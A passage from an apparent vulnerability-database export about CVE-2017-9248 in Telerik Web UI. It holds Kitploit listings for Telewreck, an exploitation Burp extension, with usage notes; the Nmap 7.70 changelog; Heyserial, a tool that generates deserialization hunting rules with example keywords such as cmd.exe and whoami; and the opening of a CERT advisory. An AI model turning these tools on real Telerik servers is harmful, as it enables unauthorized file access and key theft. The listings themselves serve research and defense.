button.\n\n[![](https://3.bp.blogspot.com/-zlyBCAkR9No/W345zzYeEuI/AAAAAAAAMNg/cWjXp666zpUmIk-5P1Eh8xUceEY4A7nRwCLcBGAs/s640/Telewreck_7_04.png)](<https://3.bp.blogspot.com/-zlyBCAkR9No/W345zzYeEuI/AAAAAAAAMNg/cWjXp666zpUmIk-5P1Eh8xUceEY4A7nRwCLcBGAs/s1600/Telewreck_7_04.png>)\n\n 5. If there's any error, the **Telewreck** tab would appear in your Burp.\n\n[![](https://1.bp.blogspot.com/--UhicVODu2Y/W3454iq9cVI/AAAAAAAAMNk/emXEyqmmbTcdDkubYkjp2rWvENjyQSUngCLcBGAs/s640/Telewreck_8_05.png)](<https://1.bp.blogspot.com/--UhicVODu2Y/W3454iq9cVI/AAAAAAAAMNk/emXEyqmmbTcdDkubYkjp2rWvENjyQSUngCLcBGAs/s1600/Telewreck_8_05.png>)\n\n \n**Notes** \n\n\n 1. This extension requires Python's **requests** module. Just run `pip install requests` to install it.\n 2. The text area under Telewreck tab doesn't function as a console. So, `stoud` and `stderr` outputs cannot be seen there. However, you can view them under the **Output** and **Errors** sections of the **Extender** tab.\n 3. Before running another bruteforce, cancel the current process first by clicking the **Cancel** button.\n 4. If the key can't be bruteforced, then probably the key has been set up securely and/or the application is not using a default installation of Telerik.\n 5. If the key can't be bruteforced and/or there are some issues, it's recommended to fall back to the original exploit tool.\n \n \n\n\n**[Download Telewreck](<https://github.com/capt-meelo/Telewreck>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-29T13:33:00", "type": "kitploit", "title": "Telewreck - A Burp Extension To Detect And Exploit Versions Of Telerik Web UI Vulnerable To CVE-2017-9248", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2018-08-29T13:33:20", "id": "KITPLOIT:8244477187189155516", "href": "http://www.kitploit.com/2018/08/telewreck-burp-extension-to-detect-and.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-07T12:04:59", "description": "[![](https://2.bp.blogspot.com/-Y6JS7G2qSEY/WYE0RzV5iPI/AAAAAAAAIcE/a0xxwoL0lgkMobeo94eAZ5KYEbGRcelOwCLcBGAs/s640/nmap.png)](<https://2.bp.blogspot.com/-Y6JS7G2qSEY/WYE0RzV5iPI/AAAAAAAAIcE/a0xxwoL0lgkMobeo94eAZ5KYEbGRcelOwCLcBGAs/s1600/nmap.png>)\n\n \n\n\nNmap (\"Network Mapper\") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer ([Zenmap](<https://nmap.org/zenmap/>)), a flexible data transfer, redirection, and debugging tool ([Ncat](<https://nmap.org/ncat/>)), a utility for comparing scan results ([Ndiff](<https://nmap.org/ndiff/>)), and a packet generation and response analysis tool ([Nping](<https://nmap.org/nping/>)).\n\n \n\n\nNmap was named \u201cSecurity Product of the Year\u201d by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in [twelve movies](<https://nmap.org/movies/>), including [The Matrix Reloaded](<https://nmap.org/movies/#matrix>), [Die Hard 4](<https://nmap.org/movies/#diehard4>), [Girl With the Dragon Tattoo](<https://nmap.org/movies/#gwtdt>), and [The Bourne Ultimatum](<https://nmap.org/movies/#bourne>).\n\n \n\n\n**Features**\n\n * **Flexible**: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many [port scanning](<https://nmap.org/book/man-port-scanning-techniques.html>) mechanisms (both TCP & UDP), [OS detection](<https://nmap.org/book/osdetect.html>), [version detection](<https://nmap.org/book/vscan.html>), ping sweeps, and more. See the [documentation page](<https://nmap.org/docs.html>).\n * **Powerful**: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.\n * **Portable**: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.\n * **Easy**: While Nmap offers a rich set of advanced features for power users, you can start out as simply as \"nmap -v -A _targethost_\". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.\n * **Free**: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for [free download](<https://nmap.org/download.html>), and also comes with full source code that you may modify and redistribute under the terms of the [license](<https://nmap.org/data/COPYING>).\n * **Well Documented**: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages [here](<https://nmap.org/docs.html>).\n * **Supported**: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the [Nmap mailing lists](<https://nmap.org/#lists>). Most bug reports and questions should be sent to the [nmap-dev list](<http://seclists.org/nmap-dev>), but only after you read the [guidelines](<https://nmap.org/book/man-bugs.html>). We recommend that all users subscribe to the low-traffic [nmap-hackers](<http://seclists.org/nmap-hackers>) announcement list. You can also find Nmap on [Facebook](<https://facebook.com/nmap>) and [Twitter](<https://twitter.com/nmap>). For real-time chat, join the #nmap channel on [Freenode](<https://freenode.net/>) or [EFNet](<http://www.efnet.org/>).\n * **Acclaimed**: Nmap has won numerous awards, including \"Information Security Product of the Year\" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the [press page](<https://nmap.org/nmap_inthenews.html>) for further details.\n * **Popular**: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.\n\n \n\n\n**Changelog**\n\n \n\n \n \n Here is the full list of significant changes:\n \n \u2022 [Windows] We made a ton of improvements to our Npcap Windows packet\n capturing library (https://nmap.org/npcap/) for greater performance and\n stability, as well as smoother installer and better 802.11 raw frame\n capturing support. Nmap 7.70 updates the bundled Npcap from version 0.93 to\n 0.99-r2, including all these changes from the last seven Npcap releases:\n https://nmap.org/npcap/changelog\n \n \u2022 Integrated all of your service/version detection fingerprints submitted\n from March 2017 to August 2017 (728 of them). The signature count went up\n 1.02% to 11,672, including 26 new softmatches. We now detect 1224\n protocols from filenet-pch, lscp, and netassistant to sharp-remote,\n urbackup, and watchguard. We will try to integrate the remaining\n submissions in the next release.\n \n \u2022 Integrated all of your IPv4 OS fingerprint submissions from September\n 2016 to August 2017 (667 of them). Added 298 fingerprints, bringing the new\n total to 5,652. Additions include iOS 11, macOS Sierra, Linux 4.14, Android\n 7, and more.\n \n \u2022 Integrated all 33 of your IPv6 OS fingerprint submissions from September\n 2016 to August 2017. New groups for OpenBSD 6.0 and FreeBSD 11.0 were\n added, as well as strengthened groups for Linux and OS X.\n \n \u2022 Added the --resolve-all option to resolve and scan all IP addresses of a\n host. This essentially replaces the resolveall NSE script. [Daniel Miller]\n \n \u2022 [NSE][SECURITY] Nmap developer nnposter found a security flaw (directory\n traversal vulnerability) in the way the non-default http-fetch script\n sanitized URLs. If a user manualy ran this NSE script against a malicious\n web server, the server could potentially (depending on NSE arguments used)\n cause files to be saved outside the intended destination directory.\n Existing files couldn't be overwritten. We fixed http-fetch, audited our\n other scripts to ensure they didn't make this mistake, and updated the\n httpspider library API to protect against this by default. [nnposter,\n Daniel Miller]\n \n \u2022 [NSE] Added 9 NSE scripts, from 8 authors, bringing the total up to 588!\n They are all listed at https://nmap.org/nsedoc/, and the summaries are\n below:\n \n - deluge-rpc-brute performs brute-force credential testing against\n Deluge BitTorrent RPC services, using the new zlib library. [Claudiu Perta]\n - hostmap-crtsh lists subdomains by querying Google's Certificate\n Transparency logs. [Paulino Calderon]\n - [GH#892] http-bigip-cookie decodes unencrypted F5 BIG-IP cookies and\n reports back the IP address and port of the actual server behind the\n load-balancer. [Seth Jackson]\n - http-jsonp-detection Attempts to discover JSONP endpoints in web\n servers. JSONP endpoints can be used to bypass Same-origin Policy\n restrictions in web browsers. [Vinamra Bhatia]\n - http-trane-info obtains information from Trane Tracer SC controllers\n and connected HVAC devices. [Pedro Joaquin]\n - [GH#609] nbd-info uses the new nbd.lua library to query Network Block\n Devices for protocol and file export information. [Mak Kolybabi]\n - rsa-vuln-roca checks for RSA keys generated by Infineon TPMs\n vulnerable to Return Of Coppersmith Attack (ROCA) (CVE-2017-15361). Checks\n SSH and TLS services. [Daniel Miller]\n - [GH#987] smb-enum-services retrieves the list of services running on a\n remote Windows machine. Modern Windows systems requires a privileged domain\n account in order to list the services. [Rewanth Cool]\n - tls-alpn checks TLS servers for Application Layer Protocol Negotiation\n (ALPN) support and reports supported protocols. ALPN largely replaces NPN,\n which tls-nextprotoneg was written for. [Daniel Miller]\n \n \u2022 [GH#978] Fixed Nsock on Windows giving errors when selecting on STDIN.\n This was causing Ncat 7.60 in connect mode to quit with error: libnsock\n select_loop(): nsock_loop error 10038: An operation was attempted on\n something that is not a socket. [nnposter]\n \n \u2022 [Ncat][GH#197][GH#1049] Fix --ssl connections from dropping on\n renegotiation, the same issue that was partially fixed for server mode in\n [GH#773]. Reported on Windows with -e by pkreuzt and vinod272. [Daniel\n Miller]\n \n \u2022 [NSE][GH#1062][GH#1149] Some changes to brute.lua to better handle\n misbehaving or rate-limiting services. Most significantly,\n brute.killstagnated now defaults to true. Thanks to xp3s and Adamtimtim for\n reporing infinite loops and proposing changes.\n \n \u2022 [NSE] VNC scripts now support Apple Remote Desktop authentication (auth\n type 30) [Daniel Miller]\n \n \u2022 [NSE][GH#1111] Fix a script crash in ftp.lua when PASV connection timed\n out. [Aniket Pandey]\n \n \u2022 [NSE][GH#1114] Update bitcoin-getaddr to receive more than one response\n message, since the first message usually only has one address in it. [h43z]\n \n \u2022 [Ncat][GH#1139] Ncat now selects the correct default port for a given\n proxy type. [Pavel Zhukov]\n \n \u2022 [NSE] memcached-info can now gather information from the UDP memcached\n service in addition to the TCP service. The UDP service is frequently used\n as a DDoS reflector and amplifier. [Daniel Miller]\n \n \u2022 [NSE][GH#1129] Changed url.absolute() behavior with respect to dot and\n dot-dot path segments to comply with RFC 3986, section 5.2. [nnposter]\n \n \u2022 Removed deprecated and undocumented aliases for several long options that\n used underscores instead of hyphens, such as --max_retries. [Daniel Miller]\n \n \u2022 Improved service scan's treatment of soft matches in two ways. First of\n all, any probes that could result in a full match with the soft matched\n service will now be sent, regardless of rarity. This improves the chances\n of matching unusual services on non-standard ports. Second, probes are now\n skipped if they don't contain any signatures for the soft matched service.\n Perviously the probes would still be run as long as the target port number\n matched the probe's specification. Together, these changes should make\n service/version detection faster and more accurate. For more details on\n how it works, see https://nmap.org/book/vscan.html. [Daniel Miller]\n \n \u2022 --version-all now turns off the soft match optimization, ensuring that\n all probes really are sent, even if there aren't any existing match lines\n for the softmatched service. This is slower, but gives the most\n comprehensive results and produces better fingerprints for submission.\n [Daniel Miller]\n \n \u2022 [NSE][GH#1083] New set of Telnet softmatches for version detection based\n on Telnet DO/DON'T options offered, covering a wide variety of devices and\n operating systems. [D Roberson]\n \n \u2022 [GH#1112] Resolved crash opportunities caused by unexpected libpcap\n version string format. [Gisle Vanem, nnposter]\n \n \u2022 [NSE][GH#1090] Fix false positives in rexec-brute by checking responses\n for indications of login failure. [Daniel Miller]\n \n \u2022 [NSE][GH#1099] Fix http-fetch to keep downloaded files in separate\n destination directories. [Aniket Pandey]\n \n \u2022 [NSE] Added new fingerprints to http-default-accounts:\n + Hikvision DS-XXX Network Camera and NUOO DVR [Paulino Calderon]\n + [GH#1074] ActiveMQ, Purestorage, and Axis Network Cameras [Rob\n Fitzpatrick, Paulino Calderon]\n \n \u2022 Added a new service detection match for WatchGuard Authentication\n Gateway. [Paulino Calderon]\n \n \u2022 [NSE][GH#1038][GH#1037] Script qscan was not observing interpacket delays\n (parameter qscan.delay). [nnposter]\n \n \u2022 [NSE][GH#1046] Script http-headers now fails properly if the target does\n not return a valid HTTP response. [spacewander]\n \n \u2022 [Ncat][Nsock][GH#972] Remove RC4 from the list of TLS ciphers used by\n default, in accordance with RFC 7465. [Codarren Velvindron]\n \n \u2022 [NSE][GH#1022] Fix a false positive condition in ipmi-cipher-zero caused\n by not checking the error code in responses. Implementations which return\n an error are not vulnerable. [Juho Jokelainen]\n \n \u2022 [NSE][GH#958] Two new libraries for NSE.\n \n - idna - Support for internationalized domain names in applications\n (IDNA)\n - punycode (a transfer encoding syntax used in IDNA) [Rewanth Cool]\n \n \u2022 [NSE] New fingerprints for http-enum:\n \n - [GH#954] Telerik UI CVE-2017-9248 [Harrison Neal]\n - [GH#767] Many WordPress version detections [Rewanth Cool]\n \n \u2022 [GH#981][GH#984][GH#996][GH#975] Fixed Ncat proxy authentication issues\n [nnposter]:\n \n - Usernames and/or passwords could not be empty\n - Passwords could not contain colons\n - SOCKS5 authentication was not properly documented\n - SOCKS5 authentication had a memory leak\n \n \u2022 [GH#1009][GH#1013] Fixes to autoconf header files to allow autoreconf to\n be run. [Lukas Schwaighofer]\n \n \u2022 [GH#977] Improved DNS service version detection coverage and consistency\n by using data from a Project Sonar Internet wide survey. Numerouse false\n positives were removed and reliable softmatches added. Match lines for\n version.bind responses were also conslidated using the technique below.\n [Tom Sellers]\n \n \u2022 [GH#977] Changed version probe fallbacks so as to work cross protocol\n (TCP/UDP). This enables consolidating match lines for services where the\n responses on TCP and UDP are similar. [Tom Sellers]\n \n \u2022 [NSE][GH#532] Added the zlib library for NSE so scripts can easily handle\n compression. This work started during GSOC 2014, so we're particularly\n pleased to finally integrate it! [Claudiu Perta, Daniel Miller]\n \n \u2022 [NSE][GH#1004] Fixed handling of brute.retries variable. It was being\n treated as the number of tries, not retries, and a value of 0 would result\n in infinite retries. Instead, it is now the number of retries, defaulting\n to 2 (3 total tries), with no option for infinite retries.\n \n \u2022 [NSE] http-devframework-fingerprints.lua supports Jenkins server\n detection and returns extra information when Jenkins is detected [Vinamra\n Bhatia]\n \n \u2022 [GH#926] The rarity level of MS SQL's service detection probe was\n decreased. Now we can find MS SQL in odd ports without increasing version\n intensity. [Paulino Calderon]\n \n \u2022 [GH#957] Fix reporting of zlib and libssh2 versions in \"nmap --version\".\n We were always reporting the version number of the included source, even\n when a different version was actually linked. [Pavel Zhukov]\n \n \u2022 Add a new helper function for nmap-service-probes match lines: $I(1,\">\")\n will unpack an unsigned big-endian integer value up to 8 bytes wide from\n capture 1. The second option can be \"<\" for little-endian. [Daniel Miller]\n\n \n \n\n\n[**Download Nmap 7.70**](<https://nmap.org/download.html>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-21T12:25:00", "type": "kitploit", "title": "Nmap 7.70 - Free Security Scanner: Better service and OS detection, 9 new NSE scripts, new Npcap, and much more", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15361", "CVE-2017-9248"], "modified": "2018-03-21T12:25:06", "id": "KITPLOIT:6757608442546057638", "href": "http://www.kitploit.com/2018/03/nmap-770-free-security-scanner-better.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T21:31:10", "description": "[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/w640-h370/deserialization1.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. _(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.\n\n_Use at your own risk _in a VM_ that _you have snapshotted recently_._\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \$forked\$\" ) \\- @wh1t3p1g\n * [Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> \"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili(2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", "CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:50:45", "description": "### Overview\n\nThe Telerik Web UI, versions R2 2017 (2017.2.503) and prior, is vulnerable to a cryptographic weakness which an attacker can exploit to extract encryption keys.\n\n### Description\n\n[**CWE-326**](<http://cwe.mitre.org/data/definitions/326.html>)**: Inadequate Encryption Strength** \\- CVE-2017-9248\n\nThe `Telerik.Web.UI.dll` is vulnerable to a cryptographic weakness which allows the attacker to extract the `Telerik.Web.UI.DialogParametersEncryptionKey `and/or the `MachineKey`. \nVersions R2 2017 (2017.2.503) and prior are vulnerable. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could perform arbitrary file upload and downloads, cross-site scripting attacks, leak the `MachineKey`, or compromise the ASP.NET ViewState. \nSoftware vendors 